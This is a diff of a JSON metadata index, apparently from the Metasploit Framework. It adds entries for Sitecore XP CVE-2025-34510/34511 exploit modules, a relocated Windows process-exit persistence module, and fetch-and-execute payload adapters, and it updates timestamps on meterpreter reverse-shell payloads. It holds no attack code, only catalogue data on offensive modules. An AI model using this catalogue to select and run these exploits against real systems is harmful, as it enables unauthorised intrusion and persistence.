+      "URL-https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003667"
+    ],
+    "platform": "Windows",
+    "arch": "x86, x64",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows"
+    ],
+    "mod_time": "2025-09-11 11:04:34 +0000",
+    "path": "/modules/exploits/windows/http/sitecore_xp_cve_2025_34510.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/sitecore_xp_cve_2025_34510",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
+  "exploit_windows/http/sitecore_xp_cve_2025_34511": {
+    "name": "Sitecore XP CVE-2025-34511 Post-Authentication File Upload",
+    "fullname": "exploit/windows/http/sitecore_xp_cve_2025_34511",
+    "aliases": [],
+    "rank": 600,
+    "disclosure_date": "2025-06-17",
+    "type": "exploit",
+    "author": [
+      "Piotr Bazydlo",
+      "msutovsky-r7"
+    ],
+    "description": "This module exploits CVE-2025-34511, a file upload vulnerability in PowerShell extensions. The module exploits also CVE-2025-34509 - hardcoded credentials of ServicesAPI account - to gain foothold.",
+    "references": [
+      "CVE-2025-34511",
+      "URL-https://labs.watchtowr.com/is-b-for-backdoor-pre-auth-rce-chain-in-sitecore-experience-platform",
+      "URL-https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003667"
+    ],
+    "platform": "Windows",
+    "arch": "x86, x64",
+    "rport": 443,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Windows"
+    ],
+    "mod_time": "2025-09-11 11:04:34 +0000",
+    "path": "/modules/exploits/windows/http/sitecore_xp_cve_2025_34511.rb",
+    "is_install_path": true,
+    "ref_name": "windows/http/sitecore_xp_cve_2025_34511",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_windows/http/smartermail_rce": {
    "name": "SmarterTools SmarterMail less than build 6985 - .NET Deserialization Remote Code Execution",
    "fullname": "exploit/windows/http/smartermail_rce",
@@ -187279,54 +189616,6 @@
    "needs_cleanup": null,
    "actions": []
  },
-  "exploit_windows/local/persistence_image_exec_options": {
-    "name": "Windows Silent Process Exit Persistence",
-    "fullname": "exploit/windows/local/persistence_image_exec_options",
-    "aliases": [],
-    "rank": 600,
-    "disclosure_date": "2008-06-28",
-    "type": "exploit",
-    "author": [
-      "Mithun Shanbhag",
-      "bwatters-r7"
-    ],
-    "description": "Windows allows you to set up a debug process when a process exits.\n          This module uploads a payload and declares that it is the debug\n          process to launch when a specified process exits.",
-    "references": [
-      "URL-https://attack.mitre.org/techniques/T1183/",
-      "URL-https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/"
-    ],
-    "platform": "Windows",
-    "arch": "",
-    "rport": null,
-    "autofilter_ports": [],
-    "autofilter_services": [],
-    "targets": [
-      "Automatic"
-    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
-    "path": "/modules/exploits/windows/local/persistence_image_exec_options.rb",
-    "is_install_path": true,
-    "ref_name": "windows/local/persistence_image_exec_options",
-    "check": false,
-    "post_auth": false,
-    "default_credential": false,
-    "notes": {
-      "Reliability": [
-        "unknown-reliability"
-      ],
-      "Stability": [
-        "unknown-stability"
-      ],
-      "SideEffects": [
-        "unknown-side-effects"
-      ]
-    },
-    "session_types": [
-      "meterpreter"
-    ],
-    "needs_cleanup": null,
-    "actions": []
-  },
  "exploit_windows/local/persistence_service": {
    "name": "Windows Persistent Service Installer",
    "fullname": "exploit/windows/local/persistence_service",
@@ -188956,7 +191245,7 @@
    "targets": [
      "Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1"
    ],
-    "mod_time": "2025-06-23 12:43:46 +0000",
+    "mod_time": "2025-07-30 16:13:01 +0000",
    "path": "/modules/exploits/windows/misc/achat_bof.rb",
    "is_install_path": true,
    "ref_name": "windows/misc/achat_bof",
@@ -196300,6 +198589,58 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_windows/persistence/image_exec_options": {
+    "name": "Windows Silent Process Exit Persistence",
+    "fullname": "exploit/windows/persistence/image_exec_options",
+    "aliases": [
+      "exploits/windows/local/persistence_image_exec_options"
+    ],
+    "rank": 600,
+    "disclosure_date": "2008-06-28",
+    "type": "exploit",
+    "author": [
+      "Mithun Shanbhag",
+      "bwatters-r7"
+    ],
+    "description": "Windows allows you to set up a debug process when a process exits.\n          This module uploads a payload and declares that it is the debug\n          process to launch when a specified process exits.",
+    "references": [
+      "ATT&CK-T1183",
+      "URL-https://blogs.msdn.microsoft.com/mithuns/2010/03/24/image-file-execution-options-ifeo/"
+    ],
+    "platform": "Windows",
+    "arch": "",
+    "rport": null,
+    "autofilter_ports": [],
+    "autofilter_services": [],
+    "targets": [
+      "Automatic"
+    ],
+    "mod_time": "2025-09-26 15:44:31 +0000",
+    "path": "/modules/exploits/windows/persistence/image_exec_options.rb",
+    "is_install_path": true,
+    "ref_name": "windows/persistence/image_exec_options",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session",
+        "event-dependent"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "config-changes"
+      ]
+    },
+    "session_types": [
+      "meterpreter"
+    ],
+    "needs_cleanup": null,
+    "actions": []
+  },
  "exploit_windows/pop3/seattlelab_pass": {
    "name": "Seattle Lab Mail 5.5 POP3 Buffer Overflow",
    "fullname": "exploit/windows/pop3/seattlelab_pass",
@@ -203004,7 +205345,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-09 07:19:14 +0000",
    "path": "/modules/payloads/singles/android/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "android/meterpreter_reverse_http",
@@ -203033,7 +205374,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-09 07:19:14 +0000",
    "path": "/modules/payloads/singles/android/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "android/meterpreter_reverse_https",
@@ -203062,7 +205403,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-09 07:19:14 +0000",
    "path": "/modules/payloads/singles/android/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "android/meterpreter_reverse_tcp",
@@ -203201,7 +205542,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/aarch64/meterpreter_reverse_http",
@@ -203234,7 +205575,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/aarch64/meterpreter_reverse_https",
@@ -203267,7 +205608,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/apple_ios/aarch64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/aarch64/meterpreter_reverse_tcp",
@@ -203329,7 +205670,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/armle/meterpreter_reverse_http",
@@ -203362,7 +205703,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/armle/meterpreter_reverse_https",
@@ -203395,7 +205736,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/apple_ios/armle/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "apple_ios/armle/meterpreter_reverse_tcp",
@@ -203779,7 +206120,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-09 07:19:14 +0000",
    "path": "/modules/payloads/singles/bsd/x86/metsvc_bind_tcp.rb",
    "is_install_path": true,
    "ref_name": "bsd/x86/metsvc_bind_tcp",
@@ -203810,7 +206151,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-04-20 02:57:34 +0000",
+    "mod_time": "2025-04-09 07:19:14 +0000",
    "path": "/modules/payloads/singles/bsd/x86/metsvc_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "bsd/x86/metsvc_reverse_tcp",
@@ -206553,6 +208894,40 @@
    "adapted_refname": "linux/x64/pingback_reverse_tcp",
    "staged": false
  },
+  "payload_cmd/linux/http/x64/set_hostname": {
+    "name": "HTTP Fetch",
+    "fullname": "payload/cmd/linux/http/x64/set_hostname",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Muzaffer Umut ŞAHİN <mailatmayinlutfen@gmail.com>"
+    ],
+    "description": "Fetch and execute an x64 payload from an HTTP server.",
+    "references": [],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-05-25 11:49:38 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/http/x64/set_hostname",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/http/x64",
+    "adapted_refname": "linux/x64/set_hostname",
+    "staged": false
+  },
  "payload_cmd/linux/http/x64/shell/bind_tcp": {
    "name": "HTTP Fetch, Linux Command Shell, Bind TCP Stager",
    "fullname": "payload/cmd/linux/http/x64/shell/bind_tcp",
@@ -210498,6 +212873,40 @@
    "adapted_refname": "linux/x64/pingback_reverse_tcp",
    "staged": false
  },
+  "payload_cmd/linux/https/x64/set_hostname": {
+    "name": "HTTPS Fetch",
+    "fullname": "payload/cmd/linux/https/x64/set_hostname",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Muzaffer Umut ŞAHİN <mailatmayinlutfen@gmail.com>"
+    ],
+    "description": "Fetch and execute an x64 payload from an HTTPS server.",
+    "references": [],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-05-25 11:49:38 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/https/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/https/x64/set_hostname",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/https/x64",
+    "adapted_refname": "linux/x64/set_hostname",
+    "staged": false
+  },
  "payload_cmd/linux/https/x64/shell/bind_tcp": {
    "name": "HTTPS Fetch, Linux Command Shell, Bind TCP Stager",
    "fullname": "payload/cmd/linux/https/x64/shell/bind_tcp",
@@ -214443,6 +216852,40 @@
    "adapted_refname": "linux/x64/pingback_reverse_tcp",
    "staged": false
  },
+  "payload_cmd/linux/tftp/x64/set_hostname": {
+    "name": "TFTP Fetch",
+    "fullname": "payload/cmd/linux/tftp/x64/set_hostname",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Muzaffer Umut ŞAHİN <mailatmayinlutfen@gmail.com>"
+    ],
+    "description": "Fetch and execute an x64 payload from a TFTP server.",
+    "references": [],
+    "platform": "Linux",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2023-05-25 11:49:38 +0000",
+    "path": "/modules/payloads/adapters/cmd/linux/tftp/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/linux/tftp/x64/set_hostname",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/linux/tftp/x64",
+    "adapted_refname": "linux/x64/set_hostname",
+    "staged": false
+  },
  "payload_cmd/linux/tftp/x64/shell/bind_tcp": {
    "name": "TFTP Fetch, Linux Command Shell, Bind TCP Stager",
    "fullname": "payload/cmd/linux/tftp/x64/shell/bind_tcp",
@@ -219884,6 +222327,40 @@
    "stage_refname": "windows/x64/custom",
    "stager_refname": "windows/x64/reverse_winhttps"
  },
+  "payload_cmd/windows/http/x64/download_exec": {
+    "name": "HTTP Fetch",
+    "fullname": "payload/cmd/windows/http/x64/download_exec",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Muzaffer Umut ŞAHİN <mailatmayinlutfen@gmail.com>"
+    ],
+    "description": "Fetch and execute an x64 payload from an HTTP server.",
+    "references": [],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-01-03 14:46:15 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/http/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/http/x64/download_exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/windows/http/x64",
+    "adapted_refname": "windows/x64/download_exec",
+    "staged": false
+  },
  "payload_cmd/windows/http/x64/encrypted_shell/reverse_tcp": {
    "name": "HTTP Fetch, Windows Command Shell, Encrypted Reverse TCP Stager",
    "fullname": "payload/cmd/windows/http/x64/encrypted_shell/reverse_tcp",
@@ -222891,6 +225368,40 @@
    "stage_refname": "windows/x64/custom",
    "stager_refname": "windows/x64/reverse_winhttps"
  },
+  "payload_cmd/windows/https/x64/download_exec": {
+    "name": "HTTPS Fetch",
+    "fullname": "payload/cmd/windows/https/x64/download_exec",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Muzaffer Umut ŞAHİN <mailatmayinlutfen@gmail.com>"
+    ],
+    "description": "Fetch and execute an x64 payload from an HTTPS server.",
+    "references": [],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-01-03 14:46:15 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/https/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/https/x64/download_exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/windows/https/x64",
+    "adapted_refname": "windows/x64/download_exec",
+    "staged": false
+  },
  "payload_cmd/windows/https/x64/encrypted_shell/reverse_tcp": {
    "name": "HTTPS Fetch, Windows Command Shell, Encrypted Reverse TCP Stager",
    "fullname": "payload/cmd/windows/https/x64/encrypted_shell/reverse_tcp",
@@ -234451,6 +236962,40 @@
    "stage_refname": "windows/x64/custom",
    "stager_refname": "windows/x64/reverse_winhttps"
  },
+  "payload_cmd/windows/powershell/x64/download_exec": {
+    "name": "Powershell Exec",
+    "fullname": "payload/cmd/windows/powershell/x64/download_exec",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "Muzaffer Umut ŞAHİN <mailatmayinlutfen@gmail.com>"
+    ],
+    "description": "Execute an x64 payload from a command via PowerShell",
+    "references": [],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2022-05-27 16:41:25 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/powershell/x64/download_exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/windows/powershell/x64",
+    "adapted_refname": "windows/x64/download_exec",
+    "staged": false
+  },
  "payload_cmd/windows/powershell/x64/encrypted_shell/reverse_tcp": {
    "name": "Powershell Exec, Windows Command Shell, Encrypted Reverse TCP Stager",
    "fullname": "payload/cmd/windows/powershell/x64/encrypted_shell/reverse_tcp",
@@ -238076,6 +240621,40 @@
    "stage_refname": "windows/x64/custom",
    "stager_refname": "windows/x64/reverse_winhttps"
  },
+  "payload_cmd/windows/smb/x64/download_exec": {
+    "name": "SMB Fetch",
+    "fullname": "payload/cmd/windows/smb/x64/download_exec",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Spencer McIntyre",
+      "Muzaffer Umut ŞAHİN <mailatmayinlutfen@gmail.com>"
+    ],
+    "description": "Fetch and execute an x64 payload from an SMB server.",
+    "references": [],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2025-02-07 15:59:31 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/smb/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/smb/x64/download_exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/windows/smb/x64",
+    "adapted_refname": "windows/x64/download_exec",
+    "staged": false
+  },
  "payload_cmd/windows/smb/x64/encrypted_shell/reverse_tcp": {
    "name": "SMB Fetch, Windows Command Shell, Encrypted Reverse TCP Stager",
    "fullname": "payload/cmd/windows/smb/x64/encrypted_shell/reverse_tcp",
@@ -241083,6 +243662,40 @@
    "stage_refname": "windows/x64/custom",
    "stager_refname": "windows/x64/reverse_winhttps"
  },
+  "payload_cmd/windows/tftp/x64/download_exec": {
+    "name": "TFTP Fetch",
+    "fullname": "payload/cmd/windows/tftp/x64/download_exec",
+    "aliases": [],
+    "rank": 300,
+    "disclosure_date": null,
+    "type": "payload",
+    "author": [
+      "Brendan Watters",
+      "Muzaffer Umut ŞAHİN <mailatmayinlutfen@gmail.com>"
+    ],
+    "description": "Fetch and execute an x64 payload from a TFTP server.",
+    "references": [],
+    "platform": "Windows",
+    "arch": "cmd",
+    "rport": null,
+    "autofilter_ports": null,
+    "autofilter_services": null,
+    "targets": null,
+    "mod_time": "2024-01-03 14:46:15 +0000",
+    "path": "/modules/payloads/adapters/cmd/windows/tftp/x64.rb",
+    "is_install_path": true,
+    "ref_name": "cmd/windows/tftp/x64/download_exec",
+    "check": false,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {},
+    "session_types": false,
+    "needs_cleanup": false,
+    "payload_type": 8,
+    "adapter_refname": "cmd/windows/tftp/x64",
+    "adapted_refname": "windows/x64/download_exec",
+    "staged": false
+  },
  "payload_cmd/windows/tftp/x64/encrypted_shell/reverse_tcp": {
    "name": "TFTP Fetch, Windows Command Shell, Encrypted Reverse TCP Stager",
    "fullname": "payload/cmd/windows/tftp/x64/encrypted_shell/reverse_tcp",
@@ -244226,7 +246839,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter_reverse_http",
@@ -244259,7 +246872,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter_reverse_https",
@@ -244292,7 +246905,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/aarch64/meterpreter_reverse_tcp",
@@ -244385,7 +246998,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/meterpreter_reverse_http",
@@ -244418,7 +247031,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/meterpreter_reverse_https",
@@ -244451,7 +247064,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/armbe/meterpreter_reverse_tcp",
@@ -244648,7 +247261,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter_reverse_http",
@@ -244681,7 +247294,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter_reverse_https",
@@ -244714,7 +247327,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/armle/meterpreter_reverse_tcp",
@@ -244877,7 +247490,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/mips64/meterpreter_reverse_http",
@@ -244910,7 +247523,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/mips64/meterpreter_reverse_https",
@@ -244943,7 +247556,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mips64/meterpreter_reverse_tcp",
@@ -245045,7 +247658,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter_reverse_http",
@@ -245078,7 +247691,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter_reverse_https",
@@ -245111,7 +247724,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsbe/meterpreter_reverse_tcp",
@@ -245349,7 +247962,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter_reverse_http",
@@ -245382,7 +247995,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter_reverse_https",
@@ -245415,7 +248028,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/mipsle/meterpreter_reverse_tcp",
@@ -245582,7 +248195,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/meterpreter_reverse_http",
@@ -245615,7 +248228,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/meterpreter_reverse_https",
@@ -245648,7 +248261,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc/meterpreter_reverse_tcp",
@@ -245867,7 +248480,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb",
    "is_install_path": true,
    "ref_name": "linux/ppc64le/meterpreter_reverse_http",
@@ -245900,7 +248513,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2025-05-19 12:03:14 +0000",
+    "mod_time": "2025-08-07 15:28:56 +0000",
    "path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb",
    "is_install_path": true,
